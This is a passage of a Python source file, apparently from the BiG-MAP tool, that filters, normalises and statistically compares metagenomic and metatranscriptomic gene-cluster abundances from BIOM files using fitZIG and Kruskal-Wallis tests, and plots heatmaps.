parser.add_argument("-T", "--sample_type",
help=argparse.SUPPRESS, type=str.upper,
required=True, choices=['METAGENOMIC', 'METATRANSCRIPTOMIC'])
parser.add_argument("-M", "--metagroup",
help=argparse.SUPPRESS, type=str, required=True)
parser.add_argument("-c", "--compare", action='store_true', help=argparse.SUPPRESS,
required=False)
parser.add_argument("-e", "--explore", action='store_true', help=argparse.SUPPRESS,
required=False)
parser.add_argument("-g", "--groups", help=argparse.SUPPRESS,
type=str, nargs='+', required=False)
parser.add_argument("-t", "--threshold", help=argparse.SUPPRESS,
type=int, default=20, required=False)
parser.add_argument("-af", "--alpha_fitzig", help=argparse.SUPPRESS,
type=float, default=0.05, required=False)
parser.add_argument("-ak", "--alpha_kruskal", help=argparse.SUPPRESS,
type=float, default=0.05, required=False)
parser.add_argument("-O", "--outdir", help=argparse.SUPPRESS,
required=True)
parser.add_argument("-fe", "--file_name_explore", help=argparse.SUPPRESS,
required=False)
parser.add_argument("-fc", "--file_names_compare", help=argparse.SUPPRESS,
type=str, nargs='+', required=False)
return parser.parse_args()
######################################################################
# CONVERT BIOM
######################################################################
def export2biom(biom_file, outdir):
"""Converts biom input file to json dictionary file
parameters
----------
biom_file
string, path to biom file
outdir
string, path to output directory
returns
----------
json_file = the created json-format file
"""
json_file = os.path.join(outdir, "BiG-MAP.table.txt")
cmd_export2biom = f"biom convert -i {biom_file} -o {json_file} \
--table-type='Pathway table' --to-json"
res_export = subprocess.check_output(cmd_export2biom, shell=True)
return json_file
def get_sample_type(sample_type, json_file, metagroup):
"""Parses the biom file to extract the sample information belonging
to the inputted sample type (metagenomic/metatranscriptomic).
----------
sample_type
string, name of the sample type: metagenomic/metatranscriptomic.
json_file
dict, biom file converted to a dictionary format
metagroup
string, name of the metagroup
returns
----------
index_samples = dict, {index of sample: sample id}
list_samples = list, all of sample names belonging to the metagroup
metadata = dict, {sample id: metadata}
"""
index_samples = {}
metadata = {}
list_samples = []
for sample in json_file["columns"]:
if type(sample["metadata"]) == type(None):
print("The metadata in the BIOM file is missing. \
Please check the input metadata and filenames for BiG-MAP.map and the resulting BIOM file.")
sys.exit()
else:
if sample["metadata"] == {}:
pass
elif sample_type == (sample["metadata"]["SampleType"]).upper():
list_samples.append(sample["id"])
index = json_file["columns"].index(sample)
index_samples[index] = sample
metadata[sample["id"]] = sample["metadata"][metagroup]
return(index_samples, list_samples, metadata)
def filter_rows(json_file, sample_index):
"""
Removes rows which don't have at least the amount of positives of
the cutoff
----------
json_file
dict, biom file converted to a dictionary format
sample_index
dict, index of samples and sample ids
returns
----------
out_list = list, indexes which are above the cut-off
"""
counts = 0
index_number = 0
com = []
dict_counts = {}
tot_hits = []
out_list = []
gc_ids = []
    # Cut-off: a GC must have hits in at least 25% of the samples
cutoff = int((len(sample_index.keys()))*0.25)
# Determines the amount of hits for a GC
for data_index in json_file["data"]:
for key in sample_index.keys():
if data_index[1] == key:
if data_index[0] not in com:
com.append(data_index[0])
counts = 0
dict_counts[data_index[0]] = 0
if data_index[0] in com:
counts += 1
dict_counts[data_index[0]] = counts
# Compares the total amount of hits for a GC with the cut-off
for ids in json_file["rows"]:
if ids["id"] not in gc_ids:
gc_ids.append(ids["id"])
for ids2 in gc_ids:
for key in dict_counts.keys():
if "HG_" in ids2 and key not in tot_hits:
if key == index_number:
tot_hits.append(key)
else:
if dict_counts[key] >= cutoff and key not in tot_hits:
tot_hits.append(key)
index_number += 1
# Create list containing the data above the cut-off
for data_index in json_file["data"]:
for index_no in tot_hits:
if index_no == data_index[0]:
out_list.append(data_index)
return out_list
def get_gc_ids(json_file, index_list, index_samples):
""" Get the GC names and RPKM values from the filtered indexes
----------
json_file
dict, biom file converted to a dictionary format
index_list
list, list of the indexes above the threshold
index_samples:
dict, all the indexes with corresponding GC names
returns
----------
out_dict = dict, {GC_ids: RPKM values}
"""
out_dict = {}
rpkm_values = []
sample_index = []
gc_ids = []
index_number = 0
for ids in json_file["rows"]:
if ids["id"] not in gc_ids:
gc_ids.append(ids["id"])
# filtered index numbers of the samples
s_ids = index_samples.keys()
for ids in json_file["rows"]:
for index in index_list:
# filter index lists by selecting present sample index numbers
if index[0] == index_number and index[1] in s_ids:
rpkm_values.append(index[2])
sample_index.append(index[1])
out_dict[gc_ids[index[0]]] = rpkm_values
        # add zeros for missing values
if sample_index == []:
pass
else:
mis_index = set(list(index_samples.keys())).difference(sample_index)
for indx in mis_index:
rpkm_values.insert((indx-list(index_samples.keys())[0]), 0.0)
rpkm_values = []
sample_index = []
index_number += 1
return out_dict
def make_dataframe(gc_ids, sample_ids):
""" makes a pandas dataframe
----------
GC_ids
dict, GC names as keys and ints as values
sample_ids
list, names of the sample ids
returns
----------
df = pandas dataframe
"""
df = (pd.DataFrame(gc_ids, index=sample_ids)).T
return df
def norm_log2_data(df):
"""Normalization and log2 convertion as performed by metagenomeseq
----------
df
dataframe, rows with samples, columns with GC and RPKM values
returns
----------
norm_df = dataframe with normalized and log2 converted RPKM values
"""
norm_df = pd.DataFrame()
df_adj = df.replace(0, np.nan)
quantile_dict = (df_adj.quantile(axis=0)).to_dict() # calculate the quantile
# determine the numeric values in the dataframe
numeric_cols = [col for col in df_adj if df_adj[col].dtype.kind != 'O']
df_adj[numeric_cols] -= np.finfo(float).eps # substract the machine epsilon
    # calculate the normalization factor by taking the sum of the values below the quantile,
    # then normalize the data by dividing the counts by the normalization factor
for sample in quantile_dict.keys():
normfac = df_adj[sample][df_adj[sample] <= quantile_dict[sample]].sum()
norm_df = norm_df.append(df_adj[sample]/(normfac/1000))
norm_df = norm_df.T
norm_df[numeric_cols] += 1 # add 1 as correction for log2 calc
norm_df = (np.log2(norm_df)).replace(np.nan, 0.0) # calculate log2
return norm_df
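# Illustrative sketch (not part of BiG-MAP): the normalisation above on a toy table.
# Each sample is scaled by the sum of its counts at or below its 0.5 quantile
# (divided by 1000), after which values are log2(x + 1) transformed. The toy GC and
# sample names are made up, and the demo assumes the pandas version targeted by
# this script (which still provides DataFrame.append).
def _norm_log2_demo():
    toy = pd.DataFrame(
        {"sample1": [10.0, 0.0, 40.0], "sample2": [5.0, 20.0, 0.0]},
        index=["GC_A", "GC_B", "GC_C"],
    )
    return norm_log2_data(toy)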
def get_coverage(biom_dict, sample_list, gc_names):
""" get coverage scores from the biom file
----------
biom_dict
dict, biom file converted to a dictionary format
sample_list
list, ids of all the relevant samples
gc_names
list, names of all the relevant GCs
returns
---------
out_dict = dict {GC name: [coverage scores]}
"""
out_dict = {}
list_samples = []
list_values = []
for ids in biom_dict["rows"]:
if ids["id"] in gc_names:
for sample_name in ids["metadata"].keys():
if sample_name in sample_list and sample_name not in list_samples:
list_samples.append(sample_name)
list_values.append(float(ids["metadata"][sample_name]))
out_dict[ids["id"]] = list_values
list_samples = []
list_values = []
return out_dict
def best_cov(cov_df, df, display):
""" determines the best covered GCs
---------
cov_df
dataframe, GC names as index and coverage scores as values
df
dataframe, dataframe with RPKM scores as values
display
int, the amount of displayable GC. Default = 20
returns
---------
sign_GC = dataframe, filtered on the highest cov scores
sign_cov = dataframe, filtered coverage dataframe on the display amount
"""
cov_mean = cov_df.mean(axis=1)
cov_mean = cov_mean.nlargest(display)
sign_gc = df[df.index.isin(list(cov_mean.index))]
sign_cov = cov_df[cov_df.index.isin(list(cov_mean.index))]
return sign_gc, sign_cov
def get_relevant_hg(sign_gc, df):
""" extract the relevant housekeeping genes
---------
sign_GC
dataframe, filtered dataframe of GCs and RPKM values
df
dataframe, GC as index, sample IDs as columns and RPKM values
returns
---------
function_names = list, function desciptions of organisms
sign_hg = list, full names of the relevant HGs
id_list = list, GC and HG ids
"""
id_list = []
name_list = []
sign_hg = []
function_names = []
index_list = list(sign_gc.index)
index_full = list(df.index)
for gc_name in index_list:
name_list.append(gc_name.split("--OS=")[1].split("--SMASHregion=")[0])
id_list.append(gc_name.split("|")[1].split(".")[0])
# make a list of all the relevant HGs
for id_name in name_list:
for full_names in index_full:
if id_name in full_names and "HG_" in full_names:
sign_hg.append(full_names)
# get the function from the HG name
for hg_name in sign_hg:
function = hg_name.split("Entryname=")[1].split("--OS=")[0]
if function not in function_names:
function_names.append(function)
return(function_names, sign_hg, name_list)
def make_hg_df(function_names, sign_hg, id_list, df, groups="", metadata=""):
""" create a dataframe of HG as index and functions as colums with values as means
---------
function_names
list, function desciptions of organisms
sign_hg
list, full names of the relevant HGs
id_list
list, GC and HG ids
df
dataframe, GC as index, sample IDs as columns and RPKM values
groups
list, inputted groups, for instance: [UC, CD]
metadata
dict, {sample id: metadata}
returns
--------
relevant_hg = dataframe, index HG names, values RPKMs
mean_df = dataframe, mean RPKM values of the HGs
"""
if groups != "":
row = pd.Series(metadata, name="Metadata")
df = df.append(row).sort_values(by=["Metadata"], axis=1)
df = df.replace(0, float(0.0)).T
df = df.loc[df["Metadata"].isin(groups)].T
df = df.drop(["Metadata"], axis=0)
means_dict = ((df[df.index.isin(sign_hg)]).mean(axis=1)).to_dict()
for gc_name in means_dict.keys():
for function in function_names:
for ids in id_list:
if function in gc_name and ids in gc_name:
                    if isinstance(means_dict[gc_name], list):
means_dict[gc_name] = means_dict[gc_name]
else:
means_dict[gc_name] = [means_dict[gc_name]]
means_dict[gc_name].append(function)
means_dict[gc_name].append(ids)
mean_df = (pd.DataFrame(means_dict, index=["Mean", "Function", "ID"])).T
mean_df = mean_df.pivot(index='ID', columns='Function', values='Mean')
return mean_df
def sort_coverage(gc_df, cov, metadata):
""" sort the GCs on coverage from high to low and adds metadata
--------
gc_df
dataframe, filtered GC dataframe with RPKM values
coverage
dataframe, filtered coverage scores
metadata
dict, {sample id: metadata}
returns
--------
GC = dataframe, sorted on coverage score
meta_types = list, names of the metadata groups for each column
"""
cov_mean = cov.mean(axis=1)
gc_df = pd.concat([gc_df, cov_mean], axis=1, sort=True)
gc_df = (gc_df.sort_values(by=[0], ascending=False)).drop([0], axis=1)
# add metadata and sort on the groups
row = pd.Series(metadata, name="Metadata")
gc_df = gc_df.append(row).sort_values(by=["Metadata"], axis=1)
meta_types = list(gc_df.loc["Metadata", :].values)
gc_df = gc_df.drop(["Metadata"], axis=0)
gc_df = gc_df.replace(0, float(0.0))
return gc_df, meta_types
def sort_housekeeping(gc_df, hg_df, cov):
""" Sorts HG on coverage and appends zeros for missing values
--------
gc_df
dataframe, filtered GC dataframe with RPKM values
hg_df
dataframe, filtered HG dataframe with RPKM values
coverage
dataframe, filtered coverage scores
returns
--------
HG_new = dataframe, sorted on coverage score
"""
index_list = []
sort_id = {}
    # add zeros for non-existing HGs
index_names = list(gc_df.index)
for index in index_names:
index_list.append(index.split("--OS=")[1].split("--SMASHregion=")[0])
hg_df = hg_df.replace(np.nan, 0.0)
index_hg = list(hg_df.index)
column_hg = len(list(hg_df.columns))
cov_index = list(cov.index)
for id_gc in index_list:
if id_gc not in index_hg:
hg_df.loc[id_gc] = [0] * column_hg
# sort the HGs on coverage from high to low
for cov_id in cov_index:
for id_gc in index_list:
if id_gc in cov_id:
sort_id[id_gc] = cov_id
df_new = hg_df.rename(index=sort_id)
cov_mean = cov.mean(axis=1)
hg_new = pd.concat([df_new, cov_mean], axis=1, sort=True)
hg_new = (hg_new.sort_values(by=[0], ascending=False)).drop([0], axis=1)
return hg_new
######################################################################
# FITZIG MODEL
######################################################################
def run_fit_zig(biomfile, groups, data_group, biom_dict, outdir):
""" run metagenomeSeq fitZIG model using an R function and Rpy2
--------
biomfile
string, path to the biomfile
groups
list, names of the inputted groups
data_type
string, either metagenomic or metatranscriptomic
data_group
string, name of of the groups. For instance: DiseaseStatus
returns
--------
fitzig_out = R dataframe containing the fitzig results
"""
# import and install R packages
base = importr('base')
utils = importr('utils')
utils = rpackages.importr('utils')
packnames = ('biomformat', 'metagenomeSeq')
dict_length = 0
for sample in biom_dict["columns"]:
if sample["metadata"] == {}:
mock_dict = {}
out_list =[]
new_biom_file = os.path.join(outdir + "/BiG-MAP.adj.biom")
with open (biomfile, "r") as biom:
for line in biom:
if "{}" in line:
for i in range(dict_length):
mock_dict[str(i)] = "NA"
mock_dict_out = json.dumps(mock_dict)
new_line = f' "metadata": {mock_dict_out}\n'
out_list.append(new_line)
else:
out_list.append(line)
with open (new_biom_file, "w") as nw_biom:
for line in out_list:
nw_biom.write(line)
pass
else:
dict_length = len(sample["metadata"])
data_type = sample["metadata"]["SampleType"]
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
for i in names_to_install:
utils.install_packages(i, repos="http://cran.rstudio.com/")
metagenomeseq = importr('metagenomeSeq')
biomformat = importr('biomformat')
r_command = ('''
run_fitZIG <- function(path, group1, group2, datatype, datagroup){
### load and filter the biom file for the inputted groups and data types
MR <- loadBiom(path)
MR_sample <- MR[,which(pData(MR)$SampleType==datatype)]
cut_off <- floor(length(colnames(MRcounts(MR_sample, norm=F, log=T)))*0.25)
MR_sample <- filterData(MR_sample, present = cut_off)
MR_mod <- MR_sample[,which(pData(MR_sample)[datagroup]==group1 | \
pData(MR_sample)[datagroup] == group2)]
d1 <- pData(MR_mod)[datagroup][,1]
### calculate the normalization factor
normFactor <- calcNormFactors(obj=MR_mod,p=0.5)
normFactor <- log2(normFactor/median(normFactor$normFactors) + 1)
mod <- model.matrix(~d1 + normFactor$normFactors)
pData(MR_mod@expSummary$expSummary)$normFactors = normFactor
### run the fitZIG model
fit <- fitZig(obj = MR_mod, mod = mod, useCSSoffset = F)
### perform FDR correction
MR_coefs <- MRcoefs(fit, by=2, number = length(d1), group = 2, \
adjustMethod = "BH", alpha = 0,01, taxa = fit@taxa)
MR_coefs$clust_name = rownames(MR_coefs)
return(MR_coefs)
}
''')
# call the R function
r_pkg = STAP(r_command, "r_pkg")
biom_check = os.path.join(outdir + "/BiG-MAP.adj.biom")
if os.path.exists(biom_check):
try:
fitzig_out = r_pkg.run_fitZIG(biom_check, groups[0], groups[1], data_type, data_group)
os.remove(os.path.join(outdir + "/BiG-MAP.adj.biom"))
except subprocess.CalledProcessError:
print("There has been an error in the R-script, please check the input (meta)data")
sys.exit()
else:
try:
fitzig_out = r_pkg.run_fitZIG(biomfile, groups[0], groups[1], data_type, data_group)
except subprocess.CalledProcessError:
print("There has been an error in the R-script, please check the input (meta)data")
sys.exit()
return fitzig_out
######################################################################
# KRUSKAL WALLIS
######################################################################
def kruskal_wallis(norm_df, metadata, groups):
""" performes the kruskal wallis test and corrects the obtained p-values
using Benjamini Hochberg FDR correction
--------
norm_df
dataframe, normalized GCs
metadata
dict, {sample id: metadata}
groups
list, names of the inputted groups
returns
--------
fdr_df = dataframe, contains the adjusted P-values for the GCs
"""
gc_groups = {}
p_values = []
group1 = groups[0]
group2 = groups[1]
row = pd.Series(metadata, name="Metadata")
df = norm_df.append(row).sort_values(by=["Metadata"], axis=1)
df = df.replace(0, float(0.0)).T
df = df.loc[df["Metadata"].isin(groups)]
counts = df["Metadata"].value_counts()
if len(counts[counts>=3].index) != 2:
print("Not enough samples detected to perform a differentially \
expression analysis. Please provide at least 3 samples for each group")
sys.exit()
for gc_name in df.columns:
if "GC_DNA--" in gc_name: # filter out the housekeeping genes
gc_groups[gc_name] = {}
for grp in df['Metadata'].unique():
# make arrays of the groups per GC {GC: {group1: array, group2: array}}
gc_groups[gc_name][grp] = df[gc_name][df['Metadata'] == grp].values
# perform Kruskal Wallis test
for gc in gc_groups.keys():
no, pval = mstats.kruskalwallis(gc_groups[gc][group1], gc_groups[gc][group2])
p_values.append(pval)
fdr = fdrcorrection(p_values, alpha=0.05, method="i")
fdr_df = pd.DataFrame(data=fdr, columns=gc_groups.keys(), index=["T/F", "pval"]).T
return fdr_df
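# Illustrative sketch (not part of BiG-MAP): the statistics used above on toy data.
# Two made-up groups of log2 RPKM values are compared with Kruskal-Wallis, and the
# resulting p-value is adjusted with Benjamini-Hochberg FDR, mirroring the calls
# inside kruskal_wallis(); the two extra p-values are placeholders.
def _kruskal_fdr_demo():
    group1 = np.array([1.2, 1.5, 1.1, 1.4])
    group2 = np.array([2.4, 2.2, 2.8, 2.6])
    _, pval = mstats.kruskalwallis(group1, group2)
    rejected, adjusted = fdrcorrection([pval, 0.20, 0.70], alpha=0.05, method="i")
    return rejected, adjusted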
######################################################################
# STRUCTURE RESULTS
######################################################################
def parse_results(results, all_counts, groups, metadata, alpha, res_type):
""" parse the output results of the fitZIG or Kruskal Wallis model
--------
results
dataframe, R or pandas structured dataframe
all_counts
dict, normalized GCs and RPKM values
groups
list, names of the groups
metadata
dict, {sample id: metadata}
alpha
float, value to determine significance
res_type
string, either fitzig or kruskal
returns
--------
counts = dataframe containing the significant counts according to fitzig
meta_types = list of metagroups
"""
meta_types = []
counts = []
if res_type == "fitzig":
gc_names = list(results[3])
adj_pvals = list(results[2])
else:
gc_names = results.index
adj_pvals = list(results["pval"])
df = pd.DataFrame(adj_pvals, index=gc_names, columns=["Adj p-values"])
df = df[df.index.str.contains("GC_DNA--")]
df = df[df["Adj p-values"] < alpha]
sign_gc = list(df.index)
if sign_gc == [] and res_type == "fitzig":
print("There are no significant gene clusters found. Try increasing the alpha (-af flag)")
sys.exit()
elif sign_gc == [] and res_type == "kruskal":
print("There are no significant gene clusters found. Try increasing the alpha (-ak flag)")
else:
row = pd.Series(metadata, name="Metadata")
counts = all_counts.append(row).sort_values(by=["Metadata"], axis=1)
counts = counts.replace(0, float(0.0)).T
counts = counts.loc[counts["Metadata"].isin(groups)].T
meta_types = list(counts.loc["Metadata", :].values)
counts = counts.drop(["Metadata"], axis=0)
counts = counts[all_counts.index.isin(sign_gc)]
return counts, meta_types
def order_coverage(metadata, cov, groups):
""" order the coverage scores on the metadata
--------
metadata
dict, {sample id: metadata}
cov
dataframe, relavant coverage scores
returns
--------
cov = dataframe, filtered coverage dict on the metadata
"""
group_meta = {}
for sample_id in metadata.keys():
if metadata[sample_id] in groups:
group_meta[sample_id] = metadata[sample_id]
row = pd.Series(group_meta, name="Metadata")
cov = cov.append(row).sort_values(by=["Metadata"], axis=1).T
cov = cov.replace(0, float(0.0))
cov = cov.groupby(["Metadata"]).mean().T
return cov, group_meta
def get_log2fold(gc_df, groups, group_meta):
""" calculate the log2 fold change
--------
gc_df
dataframe, relevant GCs
groups
list, inputted groups
returns
--------
log_fold = dataframe, log2 fold change of the relevant GCs
"""
groups = sorted(groups)
group1 = groups[0]
group2 = groups[1]
row = pd.Series(group_meta, name="Metadata")
sign_fit_adj = gc_df.append(row).sort_values(by=["Metadata"], axis=1).T
sign_fit_adj = sign_fit_adj.replace(0, float(0.0))
sign_fit_adj = sign_fit_adj.groupby(["Metadata"]).mean().T
sign_fit_adj["log2_fold"] = sign_fit_adj[group1] - sign_fit_adj[group2]
log_fold = sign_fit_adj.drop([group1, group2], axis=1)
return log_fold
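# Illustrative sketch (not part of BiG-MAP): because the table is already log2
# transformed, the fold change above is simply the difference of the per-group means.
# The two mean values below are made-up example numbers.
def _log2fold_demo(mean_group1: float = 6.0, mean_group2: float = 4.5) -> float:
    # 6.0 - 4.5 == 1.5, i.e. roughly a 2**1.5 ~ 2.8-fold difference on the linear scale
    return mean_group1 - mean_group2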
def structure_data(gc_df, cov, log_fold):
""" sort the data for the fitzig model
--------
hg_df
dataframe, relevant HGs
gc_df
dataframe, relevant GCs
cov
dataframe, relevant coverage
log_fold
dataframe, log2 fold change
returns
--------
hg_df = dataframe with the HG names as index and HG RPKMs as values
sorted_cov = dataframe with GC names as index and coverage scores as values
log_fold = dataframe with the log2 fold change
sorted_gc = dataframe with the GC names as index and GC RPKMs as values
"""
index_list = []
index_names = list(gc_df.index)
for index in index_names:
index_list.append(index.split("|")[1].split(".")[0])
gc_df = gc_df.replace(0, float(0.0))
# sort the dataframe on the mean coverage from high to low
cov_mean = cov.mean(axis=1)
sorted_gc = pd.concat([gc_df, cov_mean], axis=1, sort=True)
sorted_gc = (sorted_gc.sort_values(by=[0], ascending=False)).drop([0], axis=1)
# sort the coverage on the mean coverage
sorted_cov = pd.concat([cov, cov_mean], axis=1, sort=True)
sorted_cov = (sorted_cov.sort_values(by=[0], ascending=False)).drop([0], axis=1)
sorted_cov = pd.melt(sorted_cov.reset_index(), \
id_vars="index", var_name="group", value_name="cov")
# sort the log2 fold change on the mean coverage
sorted_log_fold = pd.concat([log_fold, cov_mean], axis=1, sort=True)
sorted_log_fold = (sorted_log_fold.sort_values(by=[0], ascending=False)).drop([0], axis=1)
return sorted_cov, sorted_log_fold, sorted_gc
def movetodir(outdir, dirname, pattern):
"""moves files matching a patterd into new directory
parameters
----------
outdir
string, the path to output directory
dirname
string, name of the new direcory
pattern
string, regex
returns
----------
None
"""
# Make directory
try:
os.mkdir(os.path.join(outdir, dirname))
except:
pass
# Move files into new directory
for f in os.listdir(outdir):
if re.search(pattern, f):
try:
shutil.move(os.path.join(outdir, f), os.path.join(outdir, dirname))
except:
pass
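# Illustrative sketch (not part of BiG-MAP): collecting all heatmap PDFs produced by
# this script into a "figures" subdirectory with the helper above. The directory name
# and regex pattern are examples only.
def _movetodir_demo(outdir):
    movetodir(outdir, "figures", r"\.pdf$")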
######################################################################
# VISUALIZATION
######################################################################
def make_explore(sign_gc, cov, metadata, metagroup, sample_type, outdir, \
file_name="explore_heatmap", sign_hg=""):
""" Creates the explore heatmap in pdf format.
----------
sign_GC
dataframe, rows contain samples, columns significant GCs, \
values are normalized RPKM
cov
dataframe, rows contain samples, columns GCs, values are coverage scores
sign_hg
dataframe, rows contain housekeeping gene functions, columns GCs IDs, \
values are RPKM
metadata
dict, {sample id: metadata}
metagroup
string, metagroup name
sample_type
string, metagenomic/metatranscriptomic
outdir
string, path to output directory
returns
----------
"""
y_axis_labels = []
percentage = []
pdf_file = os.path.join(outdir, f"{file_name}.pdf")
eps_file = os.path.join(outdir, f"{file_name}.eps")
index_names = list(sign_gc.index)
for name in index_names:
name_function = name.split("Entryname=")[1].split("--SMASH")[0]
gc_id = name.split("|")[1]
full_name=f"{name_function}--ID={gc_id}"
if len(full_name) > 80:
function, species = name_function.split("--OS=")
full_name=f"{function}\nOS={species}--ID={gc_id}"
y_axis_labels.append(full_name)
with PdfPages(pdf_file) as pdf:
fig = plt.figure(figsize=(90, 40))
fig.subplots_adjust(wspace=0.0, hspace=0.0) # space between the plots
# bar to display the groups
ax0 = plt.subplot2grid((15, 14), (0, 2), colspan=9, rowspan=1)
values, counts = np.unique(list(metadata.values()), return_counts=True)
for count in counts:
percentage.append(int(count)/sum(counts) * 100)
df = pd.DataFrame(list(zip(values, percentage)), columns=[metagroup, 'val'])
group_bar = df.set_index(metagroup).T.plot(kind='barh', stacked=True, \
ax=ax0, colormap='summer')
group_bar.axis('off')
plt.xlim([0, 100])
plt.title(f"Explore heatmap: {sample_type}", fontsize=60)
# places legends on different coordinates for metagenomic or metatranscriptomic data
if sample_type == "METAGENOMIC":
ax0.text(120, -4, 'Abundance (DNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.31, -7), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.85, .52, .01, .1])
else:
ax0.text(125.4, -2.5, 'Expression (RNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.37, -8.7), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.87, .60, .01, .1])
# heatmap of RPKM values on the first position of the grid
ax1 = plt.subplot2grid((14, 14), (1, 2), colspan=9, rowspan=14)
heatmap = sns.heatmap(sign_gc, ax=ax1, cbar_ax=cbar_ax, cmap='viridis', \
xticklabels=False, linewidths=.05, linecolor='black')
lower_half, upper_half = plt.ylim() # discover the values for bottom and top
lower_half += 0.5 # Add 0.5 to the bottom
upper_half -= 0.5 # Subtract 0.5 from the top
plt.ylim(lower_half, upper_half)
ax1.set_yticklabels(labels=y_axis_labels, rotation=0, fontsize=35)
# coverage barplot in the second position of the grid
ax2 = plt.subplot2grid((14, 14), (1, 11), colspan=1, rowspan=14)
coverage = sns.barplot(x=cov.mean(axis=1).sort_values(ascending=False), \
y=cov.index, ax=ax2, label="Coverage", color="grey")
plt.xlabel("Coverage", fontsize=40)
plt.tick_params(labelsize=30)
coverage.set(yticks=[])
if sample_type == "METATRANSCRIPTOMIC":
            # housekeeping genes heatmap in the third position of the grid
ax3 = plt.subplot2grid((14, 14), (1, 12), colspan=1, rowspan=14)
cbar_ax = fig.add_axes([0.87, .40, .01, .1])
heatmap2 = sns.heatmap(sign_hg, xticklabels=True, \
linewidths=.01, linecolor='black', yticklabels=False, ax=ax3, \
cbar_ax=cbar_ax)
ax3.text(6.2, 8.4, 'Housekeeping \n genes', fontsize=40)
ax3.set_xticklabels(sign_hg.columns, rotation=90, fontsize=30)
ax3.set_ylabel('')
plt.savefig(eps_file, format='eps')
pdf.savefig()
return
def make_compare(sign_gc, log_fold, cov, metadata, metagroup, sample_type,\
outdir, groups, file_name, plot_type, alpha=0.15, sign_hg=""):
""" Creates the explore heatmap in pdf format
----------
sign_GC
dataframe, rows contain samples, columns significant GCs, \
values are normalized RPKM
cov
dataframe, rows contain samples, columns GCs, values are coverage scores
sign_hg
dataframe, rows contain housekeeping gene functions, columns GCs IDs, \
values are RPKM
metadata
dict, {sample id: metadata}
metagroup
string, metagroup name
sample_type
string, metagenomic/metatranscriptomic
outdir,
string, path to output directory
groups
list, names of the groups
alpha
float, cut-off value of fitZIG/Kruskal Wallis
returns
----------
"""
y_axis_labels = []
percentage = []
group1 = groups[0]
group2 = groups[1]
eps_file = os.path.join(outdir, f"{file_name}.eps")
pdf_file = os.path.join(outdir, f"{file_name}.pdf")
index_names = list(sign_gc.index)
for name in index_names:
name_function = name.split("Entryname=")[1].split("--SMASH")[0]
gc_id = name.split("|")[1]
full_name=f"{name_function}--ID={gc_id}"
if len(full_name) > 90:
function, species = name_function.split("--OS=")
full_name=f"{function}\nOS={species}--ID={gc_id}"
y_axis_labels.append(full_name)
with PdfPages(pdf_file) as pdf:
fig = plt.figure(figsize=(90, 40))
fig.subplots_adjust(wspace=0.0, hspace=0.0) # space between the plots
# bar to display the groups
ax0 = plt.subplot2grid((15, 15), (0, 3), colspan=8, rowspan=1)
values, counts = np.unique(list(metadata.values()), return_counts=True)
for count in counts:
percentage.append(int(count)/sum(counts) * 100)
df = pd.DataFrame(list(zip(values, percentage)), columns=[metagroup, 'val'])
group_bar = df.set_index(metagroup).T.plot(kind='barh', stacked=True, \
ax=ax0, colormap='summer')
group_bar.axis('off')
plt.xlim([0, 100])
if plot_type == "fitzig":
plt.title(\
f"fitZIG model: {sample_type} \n p<{alpha} -- {group1} vs {group2}", fontsize=60)
else:
plt.title(\
f"Kruskal Wallis model: {sample_type} \n p<{alpha} -- {group1} vs {group2}", fontsize=60)
# places legends on different coordinates for metagenomic or metatranscriptomic data
if sample_type == "METAGENOMIC":
ax0.text(126.0, -4.3, 'Abundance (DNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.40, -6.9), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.82, .52, .01, .1])
else:
ax0.text(140.4, -2.5, 'Expression (RNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.54, -10.5), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.87, .60, .01, .1])
# heatmap of RPKM values on the first position of the grid
ax1 = plt.subplot2grid((14, 15), (1, 3), colspan=8, rowspan=14)
heatmap = sns.heatmap(sign_gc, ax=ax1, cbar_ax=cbar_ax, cmap='viridis', \
xticklabels=False, linewidths=.05, linecolor='black')
lower_half, upper_half = plt.ylim() # discover the values for bottom and top
lower_half += 0.5 # Add 0.5 to the bottom
upper_half -= 0.5 # Subtract 0.5 from the top
plt.ylim(lower_half, upper_half)
ax1.set_yticklabels(labels=y_axis_labels, rotation=0, fontsize=35)
# log2 fold-change barplot in the second position of the grid
ax2 = plt.subplot2grid((14, 15), (1, 11), colspan=1, rowspan=14)
log2_fc = sns.barplot(x=log_fold.mean(axis=1), \
y=log_fold.index, ax=ax2, label="LFC", color="grey")
plt.xlabel("Log2 fc", fontsize=40)
plt.tick_params(labelsize=30)
log2_fc.set(yticks=[])
        # coverage stripplot in the third position of the grid
ax3 = plt.subplot2grid((14, 15), (1, 12), colspan=1, rowspan=14)
coverage = sns.stripplot(data=cov, y="index", hue="group", x="cov", ax=ax3, size=20)
plt.xlabel("cov", fontsize=40)
plt.ylabel(None)
plt.tick_params(labelsize=30)
coverage.set(yticks=[])
if sample_type == "METATRANSCRIPTOMIC":
legend2 = plt.legend(loc='center left', bbox_to_anchor=(2.3, 0.32), frameon=False, \
prop={'size': 35}, title="Coverage", markerscale=3)
legend2.get_title().set_fontsize('40')
# housekeeping genes heatmap in the fourth position of the grid
ax4 = plt.subplot2grid((14, 15), (1, 13), colspan=1, rowspan=14)
cbar_ax = fig.add_axes([0.87, .40, .01, .1])
heatmap2 = sns.heatmap(sign_hg, xticklabels=True, \
linewidths=.01, linecolor='black', yticklabels=False, ax=ax4, \
cbar_ax=cbar_ax)
ax4.text(1.7, 0.6, 'Housekeeping \n genes', horizontalalignment='center', \
verticalalignment='center', transform=ax4.transAxes, fontsize=40)
ax4.set_xticklabels(sign_hg.columns, rotation=90, fontsize=30)
ax4.set_ylabel('')
ax4.set_xlabel('')
else:
legend2 = plt.legend(loc='center left', bbox_to_anchor=(1.2, 0.34), frameon=False, \
prop={'size': 35}, title="Coverage", markerscale=3)
legend2.get_title().set_fontsize('40')
plt.savefig(eps_file, format='eps')
pdf.savefig()
return
######################################################################
# MAIN
######################################################################
def main():
"""
Steps
--------
1) Load the biom file and convert to a dictionary
